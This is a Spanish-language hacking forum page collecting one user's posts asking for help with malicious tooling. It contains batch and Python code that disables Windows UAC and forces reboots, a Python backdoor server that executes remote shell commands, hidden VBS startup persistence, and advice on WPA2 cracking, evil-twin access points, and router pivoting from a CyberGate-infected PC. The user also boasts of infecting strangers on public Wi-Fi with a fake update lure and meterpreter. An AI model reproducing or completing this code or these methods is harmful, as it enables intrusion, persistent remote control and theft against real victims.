Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - DarkXploitz

#1
buenas despues de tanto buscar al fin consegui como desactivar el uac  ;D ;D ;D pero hay una parte del codigo que no logro que funcione

Código: dos
@echo off
setlocal
reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t "REG_DWORD" /d "0" >NUL 2>&1 && (set /a existe=1) || (set /a existe=0)
if "%existe%"=="0" (
C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
)
else (

echo
)
endlocal



1-abre registro
2- verifica si el valor 1 existe, si existe lo cambia a 0 y si es 0 hace otra cosa (else)
3-deberia reiniciar pero no se donde poner el shutdown lo e puesto al final del segundo code pero nada no reinicia lo  puse en el else y nada
#2
buenas paso x aqui porque estoy haciendo un proyecto personal, necesito crear una funcion phython3 para desactivar uac en windows a traves del registro, ya e logrado que funcione pero con .bat, el valor por defecto del uac activo es 1.

(1) necesito una funcion que abra el registro y me cambie el valor 1 por un 0 y reinicie la pc.
(2) que chequee que si ya el valor es 0 no haga nada y pase a la siguiente orden o funcion.

una sola funcion usando winreg, por mas que e investigado no entiendo ese modulo de antemano muchas gracias

codigo .bat que uso para desactivar uac windows

Código: dos
C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

#3
buenas tengo ya algun tiempo fuera de la rama por problemas personales pero ya regrese, regrese quemado en cuanto a programacion muchas lagunas muchas, necesito su ayuda con el siguiente codigo para un rat, necesito saber como hacer para que lo que yo escriba en el raw_inpun se ingrese en el client.send() y al darle enter se envie el comando, osea necesito saber como enviar los comandos escritos en raw_input sencillo pero como dije estoy quemado horita les agradeceria su ayuda

cliente
Código: python

import socket

servidor = "127.0.0.1"
puerto = 39421

cliente = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

cliente.connect((servidor, puerto))

comando = raw_input("ingrese comando:> ")

cliente.send("");

respuesta = cliente.recv(4096)

print respuesta


server

Código: python


import socket
import threading
from subprocess import Popen
from subprocess import PIPE

def administrar_clientes(socket_cliente):
    peticion = socket_cliente.recv(1024)
    print "[*] Mensaje recibido: %s" % peticion
    respuesta = Popen(peticion, shell=True, stdout=PIPE).stdout.read()
    # confirmar al cliente, que el mensaje fue recibido
    socket_cliente.send(respuesta)
    socket_cliente.close()

ip = "0.0.0.0"
puerto = 39421
max_conexiones = 5
servidor = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

servidor.bind((ip, puerto))
servidor.listen(max_conexiones)

print "[*] Esperando conexiones en %s:%d" % (ip, puerto)

while True:
    cliente, direccion = servidor.accept()
    print "[*] Conexion establecida con %s:%d" % (direccion[0], direccion[1])
    administrador_de_clientes = threading.Thread(target=administrar_clientes, args=(cliente,))
    administrador_de_clientes.start()
#4
Dudas y pedidos generales / ayuda con funcion python
Noviembre 28, 2017, 11:12:05 AM
hola estoy haciendo el siguiente scrip en python el cual desactiva el uac de windows reinicia la pc para surta efecto y luego cambia la hora de equipo a una establecida.

Código: python

import os
from datetime import datetime
import win32com.shell.shell as win32shell
import subprocess

def registro():
    try:
        #necesito verificar si ya existe la entrada registro y si existe que pase automaticamente a funcion fecha
        command1 = 'reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f'
        win32shell.ShellExecuteEx(lpVerb='runas', lpFile='cmd.exe', lpParameters='/c ' + command1)
        #aqui por logica siempre se reinicia, la primera ves que se ejecuta si o si debe reiniciar el equipo para que surja efecto
        subprocess.call("shutdown -r -f t 0")           
    except OSError:
        pass

def fecha():
    try:
       
        fecha = datetime.strptime("2001-01-01", "%Y-%m-%d")
        hoy = datetime.now()
       
        if fecha < hoy:
            os.system("date 01-01-01")
    except OSError:
        pass


def main():
    registro()
    fecha()
main()


alli esta comentado lo que necesito ese codigo es copy paste q aun no entiendo muy bien sobre registro en python se lo basico hasta ahora, practicamente necesito que la primera ves que se ejecute verifique si ya la entrada fue modificada si es asi pues que pase a la funcion fecha, despues le voy a agregar un bucle para que veriique la fecha y la cambie y tambien un autorun
#5
Dudas y pedidos generales / Ayuda armar troyano
Octubre 21, 2017, 09:58:55 PM
hola estoy aprendiendo python y voy  lo basico estaba experimentando con crear mi propio backdoor y es estado investigando y e creado lo basico una conexion establecida pero necesito ayuda estos son los codigos,

server:

Código: python
import os
import socket
import threading
from subprocess import Popen
from subprocess import PIPE

def administrar_clientes(socket_cliente):
    peticion = socket_cliente.recv(4096)
    print "[*] Mensaje recibido: %s" % peticion
    respuesta = Popen(peticion, shell=True, stdout=PIPE).stdout.read()
    # confirmar al cliente, que el mensaje fue recibido
    socket_cliente.send(respuesta)
    socket_cliente.close()

ip = "0.0.0.0"
puerto = 39421
max_conexiones = 5
servidor = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

servidor.bind((ip, puerto))
servidor.listen(max_conexiones)

print "[*] Esperando conexiones en %s:%d" % (ip, puerto)

while True:
    cliente, direccion = servidor.accept()
    print "[*] Conexion establecida con %s:%d" % (direccion[0], direccion[1])
    administrador_de_clientes = threading.Thread(target=administrar_clientes, args=(cliente,))
    administrador_de_clientes.start()


cliente:

Código: python
import os
import socket

servidor = "127.0.0.1"
puerto = 39421

cliente = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
cliente.connect((servidor, puerto))
# solicitamos la lista de archivos del home del usuario
cliente.send( "" );
respuesta = cliente.recv(4096)
print respuesta


el codigo funciona al ejecutar el server aparece la ventana de esperando conexiones cuando ejecuto el cliente establece la conexion pero hasta hay se queda quisiera ayuda para integrar la consola cmd y ejecutar comandos en la maquina infectada, encontre un modulo cmd python pero no se como integrarlo necesito ayuda estoy empesando con python pero entiendo los codigos por favor ayudenme gracias de antemano.

codigo ejecutar cmd desde python:

Código: python
import os

os.system("color a")

while True:
os.system("cls")
cmd = raw_input("Ingresar Comando:")
print os.system(cmd)
raw_input("Ingrese Nuevo Comando:")


como integro este codigo al troyano que estoy haciendo?
#6
Dudas y pedidos generales / Re:Ayuda Hack wpa2
Septiembre 20, 2017, 09:15:12 PM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
¿Ésto es lícito?

Una cosa es crackearse su propia WAN, todo queda en casa, nos comemos un bizcocho a las ocho y listo.

Y otra cosa es "asaltar" y con diccionario y todo, tú busca alguno en el Google, ya verás...

Menos mal que ésto no es lo de "me he encontrado un portátil ayúdenme con la pass de la BIOS"...

en cierto modo tambien es mi red xq en mi zona hay una sola conexion a internet entre 10 personas contratamos el servicio entre 10 personas compramos el router, entre 10 personas pagamos el servicio banda ancha asi que es mi red tambien, ahora una de esas 10 personas se fue de viaje y dejo a un familiar en su casa y en esa casa es justamente dnd esta el router y ese familiar se adueño de nuestro router y de nuestro internet osea me robaron mi internet e hay la razon, e intentado con fluxion pero el condenado no cae xq el sabe de informatica lo unico que e podido hacer hasta ahora es denegarle el servicio pero tecnicamente estoy hack o dicho de otro modo estoy recuperando mi propia red
#7
Dudas y pedidos generales / [SOLUCIONADO] Ayuda Hack wpa2
Septiembre 20, 2017, 08:46:26 AM
hola quien por favor me explica como hcer un diccionario para fuerza bruta pra wpa2 pero con palabras que yo le meta, la red tiene el nombre del dueño digamos pedroperez anteriormente yo tenia acceso a esa red pero el nuevo dueño es un tremendooo tacaño expulso a todo el mundo de la red que todos colaboramos en construir entre 10 personas compramos el router otros compraron el cable etc, osea es mi red tambien, anteriormente la clave del wifi era pedro123 me imagino que la contraseña nueva es una combinacion de eso ahora lo que kiero saber es como hacer un dccionario que me genere claves pero con las palabras que yo meta asea pedro perez 123 wifi cosas asi tengo bastantes palabras tengo bastante posible informacion, quiero un diccionario que me genere x ejemplo pedrowifi123 y cosas asi todas las posibles combinaciones con esos nombres e estado buscando pero no entiendo nada 
#8
hola estoy haciendo un curso online python y estoy en estos momentos haciendo una reverse shell en el mismo lenguaje, mi pregunta es que es lo que detectan los antivirus en una shell de este tipo ellos leen el codigo o como es la cosa si el modulo socket es algo digamoslo asi legal q lo usan los programas porque lo detecta como maligno en caso que sea el codigo soket lo q detecten
#9
Hay alguna manera en que al momento de realizar una desautenticacion de los cliente del wifi cuando se cree el fake access point:

1) que no aparescan 2 puntos de acceso ya que como saben sale el original y el fake que es que sale libre que aparesca uno solo?
2) que el fake punto de acceso aparesca como si tubiera clave con su candado y que diga wpa2 y no diga que es libre xq eso levanta sospecha 2 puntos de acceso con el mismo nombre uno libre otro cerrado
#10
Hacking / Re:MALWARE en android
Julio 10, 2017, 07:36:40 PM
exelente yo e usado ese metodo una ves realizado el mitm en ves de la pagina web utiliso el classico mensaje su reloj esta atrasado con un boton que dice windows le proporciona un mecanisco para reparar el sistema bla bla bla y al darle descargar descarga el malware y una ves que acepto la conexion meterpreter quito el mitm y listo la pc es mia jejejejejej lo hice en una plaza con wifi gratis y bueno se imaginan el desastre, cabe aclarar que que ese es un ensallo que estoy haciendo para una incursion q voy a hacer a un establecimiento de dnd necesito sacar una info que no me quieren dar los mitm son efectivos solo hay que dejar volar la mente jejejeje
#11
hola recien e empesado con python y e estado buscando como agregar una entrada de registro windows con este lenguaje y  :o :o :o :o no consigo nada en inter, es que acaso no se puede?
#12
Dudas y pedidos generales / Re:intrusion a router
Julio 08, 2017, 11:04:37 AM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Puedes ver que servicios están corriendo, algunos routers tienen acceso ssh o telnet.

escaneo la ip publica? xq mi pensado es que ya que tengo una pc en esa red a traves de esa pc ingreso al modem y desactivo el firewall del router y asi con kali me adueño del router y bueno hago lo q tengo q hacer ya q debo recuperar algo q me robaron y la pc dnd esta ese archivo esta conectada a esa red, ves osea que ya tengo troyanizada la red con la pc comprometida lo que no se es como acceder al router, te cuento que aun soy lammer en muchas cosas, mi cerebro rebosa de ideas pero aun no se programar ni nada de eso x eso pregunto y pido ayuda
#13
Dudas y pedidos generales / intrusion a router
Julio 08, 2017, 08:25:07 AM
hola tengo una pc comprometida con cibergate, esa pc se conecta a un router que quiero comprometer pero tiene el firewall arriba, mi pregunta es hay alguna manera de ingresar al router desde la pc que tengo comprometida sin tener que obviamente abrir un navegador en la pc comprometida xq obviamente si abro el router directamente la victima se dara cuenta y dira que es una brujeria  :o :o hay alguna manera de abrir un navegador de forma oculta que solo yo pueda ver, si es de crear una session meterpreter lo hago ya que tengo una pc comprometida en esa red
#14
hola acabo de instalar parrot os 3.6 version 64bit huyendole a kali porque  nunca pude instalar dicha maquina no se porque y ahora en parrot se supone que es mas facil y ahora me sale un problema de dependencias 
Código: text
libpng12-0 (>= 1.2.13-4) error 

Código: text
update & upgrade 

No soluciona la dependencia.

#15
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Podrás poner foto del error?

Además del registro hay un directorio en el que se inician los archivos que están ahí, podrías mover tu código de VBs ahí como posiblr alternativa, para ver este directorio pulsa las teclas Windows + R y escribe shell:run.

Saludos.

gracias por tu respuesta pero momentaneamente e resuelto el problema colocando el .vbs en C:\windows\system y se a ejectuado correctamente
#16
hola tengo un problema con un .vbs que lo estoy agregando al registro para que inicie con el sistema si se crea todo bien pero cuando la pc inicia lanza un error de que no se consigue el archivo .vbs y esta requete recontra comprobado que si esta que puede estar fallando alli, el .vbs es para ejecutar de forma oculta un .bat, cuando ejecuto el .vbs dando doble click sobre el funciona normal lo e pasado a .exe y el mismo problema

codigo .vbs

Código: vbnet
set objshell = createobject ("wscript.shell")
objshell.run "inicio.bat", vbhide


codigo .bat que agrega el .vbs al inicio, cuando inicia la pc dice que no se encuentra el archivo probe con
C:\Program files
y nada el mismo problema

Código: vbnet
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Setup /t REG_SZ /d "C:\Archivos de programa\Intel Explorer\update.vbs"
#17
Dudas y pedidos generales / problemas con script
Marzo 07, 2017, 10:07:09 PM
hola tenia tiempo fuera del tema hack y e regresado retomando un antiguo proyecto el cual etre muchas cosas incluya el cambio automatizado del fondo de pantaalla con un .vbs per estoy un poco oxidado este es el codigo que uso que funciona a la perfeccion

Código: text
Dim fso, MyFile
Set fso = CreateObject("Scripting.FileSystemObject")
Set MyFile = fso.GetFile("C:\wallpaper.jpg")
MyFile.Copy ("C:\wallpaper.jpg")
Dim WshShell
Set WshShell = WScript.CreateObject("Wscript.Shell")
ConvertedWallpaper = "C:\wallpaper.jpg"
Wallpaper = "C:\wallpaper.jpg"
WshShell.RegWrite "HKCU\Control Panel\Desktop\Wallpaper", Wallpaper
WshShell.RegWrite "HKCU\Control Panel\Desktop\ConvertedWallpaper", ConvertedWallpaper
WshShell.Run "C:\WINDOWS\System32\RUNDLL32.EXE user32.dll, UpdatePerUserSystemParameters", 1, False
Set WshShell = Nothing
Set objNetwork = WScript.CreateObject("WScript.Network")
strUserName = objNetwork.UserName


al ejecutarlo si me cambia el fondo pero el  fondo me sale en expandido y necesito que me salga en centrado porque se me distorciona la imagen que linea le debo agregar para que me salga centrado y no expandido gracias en lo que me puedan ayudar
#18
Dudas y pedidos generales / Re:Kali linux 2.0
Febrero 16, 2017, 09:10:51 AM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
¡Hola!

Disculpá, pero no entiendo en la totalidad tu duda. El título del post dice "Kali Linux 2.0" y decís que tenés instalada "Kali Linux 2016.2".

En todo caso, si acabás de instalarla ya viene con los repositorios, simplemente apt-get upgrade && apt-get update.

Si en todo caso aún necesitás los repositorios, tenés que usar el de Kali Rolling, que corresponde a Kali 2016.2.

Creo que esa era tu duda.
Saludos.

La 2.0 no es la 2016.2?  :o xq lo descargue directo de la pagina pinche el enlase de la 2.0 y se me descargo fue la 2016.2
#19
Hola acabo de instalar kali linux 2016.2 de 64bit pero tengo un problema no se que repositorio es el que se debe agregar para actualizar ya que salen 3

The Kali Rolling Repository
Retired Kali sana (2.0) Repositories
Retired Kali moto (1.0) Repositories

cual de esos 3 es el que me corresponde xq antes era una solo version, o los instalo todos?
#20
Dudas y pedidos generales / Bypass firewall Windows 7
Febrero 06, 2017, 09:33:00 PM
buenas alguno sabe de algun metodo para bypass el firewall en w7 e intentado frecmentando los paquetes y nada e visto contidad de videos y nada alguien sabe algun metodo que si funcione, me sale que todos los puertos estan filtrados